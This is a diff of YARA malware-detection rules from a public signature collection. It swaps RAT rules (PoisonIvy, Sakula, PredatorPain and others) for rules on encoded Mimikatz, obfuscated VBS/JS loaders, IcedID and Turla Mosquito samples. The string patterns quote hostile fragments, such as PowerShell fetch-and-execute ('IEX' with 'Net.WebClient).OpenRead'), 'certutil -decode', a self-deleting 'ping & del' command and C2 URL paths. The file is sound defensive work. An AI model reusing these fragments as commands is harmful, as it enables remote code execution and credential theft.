-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L547-L569"
+		reference = "https://goo.gl/9DNn8q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L92-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6a4e757262c02dfe46ac28940b53a5695df2d242ccd4c16b42fbfdcf96072e91"
-		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		logic_hash = "3e2b62442b5da6ab887e1eb03cdd44932651fa51ce11e87e6fc29015e708d2f3"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$exe1 = "%.2d-%.2d-%.4d"
-		$exe2 = "%s%.2d-%.2d-%.4d"
-		$exe3 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
-		$exe4 = "wcnwClass"
-		$exe5 = "[Ctrl+%c]"
-		$exe6 = "SYSTEM\\CurrentControlSet\\Control\\ProductOptions"
-		$exe7 = "%s\\.purple\\accounts.xml"
+		$s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
+		$s1 = "echo -----END CERTIFICATE----- >>" ascii
+		$s2 = "certutil -decode " ascii
 
 	condition:
-		all of them
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Pandora
+rule SIGNATURE_BASE_Stegokatz : FILE
 {
 	meta:
-		description = "Detects Pandora RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "d31e4366-8911-5c9c-92dc-a99f5233c626"
-		date = "2014-01-04"
+		description = "Encoded Mimikatz in other file types"
+		author = "Florian Roth (Nextron Systems)"
+		id = "78868bb0-af69-573d-afd2-350a46f69137"
+		date = "2015-09-11"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Pandora"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L571-L599"
+		reference = "https://goo.gl/jWPBBY"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L109-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d33598d0699bfb7e996047318099302c2c326e45d993a259c2bc145acf8cf54b"
-		score = 75
+		logic_hash = "091b07220d2a89822aa382edcecf5869d463e375747cc41f52417e66ccf0e2da"
+		score = 70
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "Can't get the Windows version"
-		$b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
-		$c = "JPEG error #%d" wide
-		$d = "Cannot assign a %s to a %s" wide
-		$g = "%s, ProgID:"
-		$h = "clave"
-		$i = "Shell_TrayWnd"
-		$j = "melt.bat"
-		$k = "\\StubPath"
-		$l = "\\logs.dat"
-		$m = "1027|Operation has been canceled!"
-		$n = "466|You need to plug-in! Double click to install... |"
-		$0 = "33|[Keylogger Not Activated!]"
+		$s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
+		$s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
 
 	condition:
-		all of them
+		filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Paradox
+rule SIGNATURE_BASE_Obfuscated_VBS_April17 : FILE
 {
 	meta:
-		description = "Detects Paradox RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "2f1e6226-799b-54eb-a4a4-6c0f1bf561b4"
-		date = "2014-01-04"
+		description = "Detects cloaked Mimikatz in VBS obfuscation"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ca60b885-bb56-55ee-a2b3-dea6958883c2"
+		date = "2017-04-21"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Paradox"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L601-L623"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L125-L137"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fef41262b78a497c65c7548c58d78ba8912725b28606fd9e99d1dbc19bdf7393"
+		logic_hash = "590dca22a4fcbc2bbfb4358c53f7cb6c06824970139cca251c4cf1bd435817b0"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "ParadoxRAT"
-		$b = "Form1"
-		$c = "StartRMCam"
-		$d = "Flooders"
-		$e = "SlowLaris"
-		$f = "SHITEMID"
-		$g = "set_Remote_Chat"
+		$s1 = "::::::ExecuteGlobal unescape(unescape(" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Plasma
+rule SIGNATURE_BASE_Obfuscated_JS_April17 : FILE
 {
 	meta:
-		description = "Detects Plasma RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "2a19c0de-0078-5487-869c-1bcabea57300"
-		date = "2014-01-04"
+		description = "Detects cloaked Mimikatz in JS obfuscation"
+		author = "Florian Roth (Nextron Systems)"
+		id = "44abd2c0-5f8d-5a8c-b282-a09853e12054"
+		date = "2017-04-21"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Plasma"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L625-L649"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_cloaking.yar#L139-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e73348d379c483a7917cf765a457739aed6940f180272fa8d0c0dd1eb8e5f562"
+		logic_hash = "c75bf0ad8dd35fabbaedb54c2630249497edbb215b6ce2b707e32f82e8fb8f56"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "Miner: Failed to Inject." wide
-		$b = "Started GPU Mining on:" wide
-		$c = "BK: Hard Bot Killer Ran Successfully!" wide
-		$d = "Uploaded Keylogs Successfully!" wide
-		$e = "No Slowloris Attack is Running!" wide
-		$f = "An ARME Attack is Already Running on" wide
-		$g = "Proactive Bot Killer Enabled!" wide
-		$h = "PlasmaRAT" wide ascii
-		$i = "AntiEverything" wide ascii
+		$s1 = "\";function Main(){for(var " ascii
+		$s2 = "=String.fromCharCode(parseInt(" ascii
+		$s3 = "));(new Function(" ascii
 
 	condition:
-		all of them
+		filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Poisonivy
+rule SIGNATURE_BASE_MAL_Icedid_GZIP_LDR_202104 : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "371686d3-878f-56fc-a702-ec49845f486b"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PoisonIvy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L651-L672"
+		description = "2021 initial Bokbot / Icedid loader for fake GZIP payloads"
+		author = "Thomas Barabosch, Telekom Security"
+		id = "fbf578e7-c318-5f67-82df-f93232362a23"
+		date = "2021-04-12"
+		modified = "2023-01-27"
+		reference = "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_icedid.yar#L14-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "874e0dfb22a03abc0f7fdc7209ff13b55dfa5dcc17db944903ca37a549eb331d"
+		logic_hash = "7a7cc6c7dcbf43bace6a1f259af38560327c34386517e719ad81068b2d9b6659"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
-		$string1 = "CONNECT %s:%i HTTP/1.0"
-		$string2 = "ws2_32"
-		$string3 = "cks=u"
-		$string4 = "thj@h"
-		$string5 = "advpack"
+		$internal_name = "loader_dll_64.dll" fullword
+		$string0 = "_gat=" wide
+		$string1 = "_ga=" wide
+		$string2 = "_gid=" wide
+		$string4 = "_io=" wide
+		$string5 = "GetAdaptersInfo" fullword
+		$string6 = "WINHTTP.dll" fullword
+		$string7 = "DllRegisterServer" fullword
+		$string8 = "PluginInit" fullword
+		$string9 = "POST" wide fullword
+		$string10 = "aws.amazon.com" wide fullword
 
 	condition:
-		$stub at 0x1620 and all of ( $string* ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
 }
-rule SIGNATURE_BASE_RAT_Predatorpain
+rule SIGNATURE_BASE_Invoke_Psimage : FILE
 {
 	meta:
-		description = "Detects PredatorPain RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "c6670179-871d-5a57-983b-d77354e2ede9"
-		date = "2014-01-04"
+		description = "Detects a command to execute PowerShell from String"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6abf53cd-6465-555b-a7d4-f5a917073f01"
+		date = "2017-12-16"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PredatorPain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L674-L702"
+		reference = "https://github.com/peewpw/Invoke-PSImage"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_psimage.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "917234f83f891ad00bd83908c244818f517ea89cf7d8c81cfc3618b8386c1804"
+		logic_hash = "ce4bc73fcba3b82e4d11203aa2c3f0b2f85c6eb9e1784ad76a7b20500b4053f8"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "holderwb.txt" wide
-		$string3 = "There is a file attached to this email" wide
-		$string4 = "screens\\screenshot" wide
-		$string5 = "Disablelogger" wide
-		$string6 = "\\pidloc.txt" wide
-		$string7 = "clearie" wide
-		$string8 = "clearff" wide
-		$string9 = "emails should be sent to you shortly" wide
-		$string10 = "jagex_cache\\regPin" wide
-		$string11 = "open=Sys.exe" wide
-		$ver1 = "PredatorLogger" wide
-		$ver2 = "EncryptedCredentials" wide
-		$ver3 = "Predator Pain" wide
+		$ = "IEX([System.Text.Encoding]::ASCII.GetString(" ascii wide
+		$ = "System.Drawing.Bitmap((a Net.WebClient).OpenRead(" ascii wide
+		$ = { 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
+            00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9
+            E8 00 00 00 09 70 48 59 73 00 00 19 D6 00 00 19
+            D6 01 18 D1 CA ED 00 00 00 07 74 49 4D 45 07 E1
+            0C 0F 13 1E 36 89 C4 28 BF 00 00 00 07 74 45 58
+            74 41 75 74 68 6F 72 00 A9 AE CC 48 00 00 00 0C
+            74 45 58 74 44 65 73 63 72 69 70 74 69 6F 6E 00
+            13 09 21 23 00 00 00 0A 74 45 58 74 43 6F 70 79
+            72 69 67 68 74 00 AC 0F CC 3A 00 00 00 0E 74 45
+            58 74 43 72 65 61 74 69 6F 6E 20 74 69 6D 65 00
+            35 F7 0F }
 
 	condition:
-		7 of ( $string* ) and any of ( $ver* )
+		filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Punisher
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_1 : FILE
 {
 	meta:
-		description = "Detects Punisher RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "1e16b3c7-9656-5570-afa2-542367aa14d8"
-		date = "2014-01-04"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1395509a-72f5-56c0-895c-3e9f15829de1"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Punisher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L704-L726"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9347b8053393c3537693273c44a2a2f095928b8bc0cdcf9365a6f060d66efeb5"
+		logic_hash = "22d799531986c30da19943f1dda305e61a305083478549e93c0ecddeade77b39"
 		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b295032919143f5b6b3c87ad22bcf8b55ecc9244aa9f6f88fc28f36f5aa2925e"
 
 	strings:
-		$a = "abccba"
-		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
-		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
-		$d = "SpyTheSpy" wide ascii
-		$e = "wireshark" wide
-		$f = "apateDNS" wide
-		$g = "abccbaDanabccb"
+		$s1 = "Pipetp" fullword ascii
+		$s2 = "EStOpnabn" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( pe.imphash ( ) == "169d4237c79549303cca870592278f42" or all of them )
 }
-rule SIGNATURE_BASE_RAT_Pythorat
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_2 : FILE
 {
 	meta:
-		description = "Detects Python RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "fc98c513-1abf-5331-b351-f6182e5b19c5"
-		date = "2014-01-04"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d23d9fe1-26e3-5012-8a88-61ebbc3fbd8f"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PythoRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L728-L751"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L32-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8edcfb8f234ff225537d19343c75788ec2a25940e80042751eea3280a967e166"
+		logic_hash = "f1f93d3bc1c4bd55fc7558716a0a1eb7a6c4c2381a4532d37f4e3559f7c809ea"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "68c6e9dea81f082601ae5afc41870cea3f71b22bfc19bcfbc61d84786e481cb4"
+		hash2 = "05254971fe3e1ca448844f8cfcfb2b0de27e48abd45ea2a3df897074a419a3f4"
 
 	strings:
-		$a = "TKeylogger"
-		$b = "uFileTransfer"
-		$c = "TTDownload"
-		$d = "SETTINGS"
-		$e = "Unknown" wide
-		$f = "#@#@#"
-		$g = "PluginData"
-		$i = "OnPluginMessage"
+		$s1 = ".?AVFileNameParseException@ExecuteFile@@" fullword ascii
+		$s3 = "no_address" fullword wide
+		$s6 = "SRRRQP" fullword ascii
+		$s7 = "QWVPQQ" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "cd918073f209c5da7a16b6c125d73746" or all of them )
 }
-rule SIGNATURE_BASE_RAT_Qrat
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_3 : FILE
 {
 	meta:
-		description = "Detects QRAT"
-		author = "Kevin Breen @KevTheHermit"
-		id = "2ee645a3-1e01-513c-a636-098e445adeca"
-		date = "2015-01-08"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c83e0a93-3f8d-572d-ac1a-92fef0b3d3f6"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L753-L773"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L54-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d404153ca64b547885e4e4581205f5fc20faf86e8ab18002c5deedca2487225"
+		logic_hash = "0f59c130b500625466da0c8b5bfd84051ee59a3b6261ee3d990d4c355b10672b"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "jar"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "443cd03b37fca8a5df1bbaa6320649b441ca50d1c1fcc4f5a7b94b95040c73d1"
 
 	strings:
-		$a0 = "e-data"
-		$a1 = "quaverse/crypter"
-		$a2 = "Qrypt.class"
-		$a3 = "Jarizer.class"
-		$a4 = "URLConnection.class"
+		$x1 = "InstructionerDLL.dll" fullword ascii
+		$s1 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+		$s2 = "/scripts/m/query.php?id=" fullword wide
+		$s3 = "SELECT * FROM AntiVirusProduct" fullword ascii
+		$s4 = "Microsoft Update" fullword wide
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "88488fe0b8bcd6e379dea6433bb5d7d8" or ( pe.exports ( "InstallRoutineW" ) and pe.exports ( "StartRoutine" ) ) or $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_RAT_Sakula : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_4 : FILE
 {
 	meta:
-		description = "Detects Sakula v1.0 RAT"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings"
-		id = "4be3179c-3b91-56db-bba9-9ccc42066f96"
-		date = "2015-10-13"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1d5c32b3-0316-525c-9386-222917144251"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L775-L817"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L79-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec4e16deb6f4a671ee665c81568e87dc9a1023328e1be242eae015c1e04cfcef"
+		logic_hash = "4765b912258491f38c03513204d9af8bc62c37df2fe583e371cbbeff6fc12298"
 		score = 75
 		quality = 85
 		tags = "FILE"
-
-	strings:
-		$s1 = "%d_of_%d_for_%s_on_%s"
-		$s2 = "/c ping 127.0.0.1 & del /q \"%s\""
-		$s3 = "=%s&type=%d"
-		$s4 = "?photoid="
-		$s5 = "iexplorer"
-		$s6 = "net start \"%s\""
-		$s7 = "cmd.exe /c rundll32 \"%s\""
-		$v1_1 = "MicroPlayerUpdate.exe"
-		$v1_2 = "CCPUpdate"
-		$v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }
-		$v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }
-		$serial01 = { 31 06 2e 48 3e 01 06 b1 8c 98 2f 00 53 18 5c 36 }
-		$serial02 = { 01 a5 d9 59 95 19 b1 ba fc fa d0 e8 0b 6d 67 35 }
-		$serial03 = { 47 d5 d5 37 2b cb 15 62 b4 c9 f4 c2 bd f1 35 87 }
-		$serial04 = { 3a c1 0e 68 f1 ce 51 9e 84 dd cd 28 b1 1f a5 42 }
-		$opcodes1 = { 89 FF 55 89 E5 83 EC 20 A1 ?? ?? ?? 00 83 F8 00 }
-		$opcodes2 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
-		$opcodes3 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
-		$opcodes4 = { 30 14 38 8D 0C 38 40 FE C2 3B C6 }
-		$opcodes5 = { 30 14 39 8D 04 39 41 FE C2 3B CE }
-		$fp1 = "Symantec Corporation" ascii wide
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b362b235539b762734a1833c7e6c366c1b46474f05dc17b3a631b3bff95a5eec"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 3 of ( $s* ) and any of ( $v1_* ) ) or ( any of ( $serial0* ) ) or ( any of ( $opcodes* ) ) ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and pe.imphash ( ) == "17b328245e2874a76c2f46f9a92c3bad"
 }
-rule SIGNATURE_BASE_RAT_Shadowtech : FILE
+
+rule SIGNATURE_BASE_Turlamosquito_Mal_5 : FILE
 {
 	meta:
-		description = "Detects ShadowTech RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "1fb15030-b400-5e70-b183-81e2527d5556"
-		date = "2014-01-04"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f3a35c9-b0f0-5ca6-8b34-19e2d45305f2"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/ShadowTech"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L819-L839"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L92-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ab024ae5ca62de30daf4392db5241220fcdb9b419bad555a996729aed9fa45d"
+		logic_hash = "5b0366194410f36c47dd41f6a36c45edbce75e3ddad19520b17bed59513e1dbc"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
-
-	strings:
-		$a = "ShadowTech" nocase
-		$b = "DownloadContainer"
-		$c = "MySettings"
-		$d = "System.Configuration"
-		$newline = "#-@NewLine@-#" wide
-		$split = "pSIL" wide
-		$key = "ESIL" wide
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "26a1a42bc74e14887616f9d6048c17b1b4231466716a6426e7162426e1a08030"
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "ac40cf7479f53a4754ac6481a4f24e57"
 }
-rule SIGNATURE_BASE_RAT_Smallnet
+rule SIGNATURE_BASE_Turlamosquito_Mal_6 : FILE
 {
 	meta:
-		description = "Detects SmallNet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "aec1f8fd-2806-527e-9d50-422f212864de"
-		date = "2014-01-04"
+		description = "Detects malware sample from Turla Mosquito report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1c320b60-ec7a-5f87-b871-f55924351f8f"
+		date = "2018-02-22"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/SmallNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L841-L861"
+		reference = "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_mosquito.yar#L105-L127"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "17a6be371ce0c616cfea0b42a30e6d9118376912002d59790b133c73fd5436a3"
+		logic_hash = "9ca6ae4313ad8f009b17188aa7184ff01a4b7e35926f3f68dc3aea12bffb9bb1"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b79cdf929d4a340bdd5f29b3aeccd3c65e39540d4529b64e50ebeacd9cdee5e9"
 
 	strings:
-		$split1 = "!!<3SAFIA<3!!"
-		$split2 = "!!ElMattadorDz!!"
-		$a1 = "stub_2.Properties"
-		$a2 = "stub.exe" wide
-		$a3 = "get_CurrentDomain"
+		$a1 = "/scripts/m/query.php?id=" fullword wide
+		$a2 = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" fullword wide
+		$a3 = "GetUserNameW fails" fullword wide
+		$s1 = "QVSWQQ" fullword ascii
+		$s2 = "SRRRQP" fullword ascii
+		$s3 = "QSVVQQ" fullword ascii
 
 	condition:
-		($split1 or $split2 ) and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 2 of ( $a* ) or 4 of them )
 }
-rule SIGNATURE_BASE_RAT_Spygate
+
+rule SIGNATURE_BASE_APT_Turlamosquito_MAL_Oct22_1 : FILE
 {
 	meta:
-		description = "Detects SpyGate RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "ed015770-81ff-5d9c-8bd0-3c225e400724"
-		date = "2014-01-04"
+		description = "Detects Turla Mosquito malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5ad0c0f-81ca-5157-aefb-ead049ada30d"
+		date = "2022-10-25"
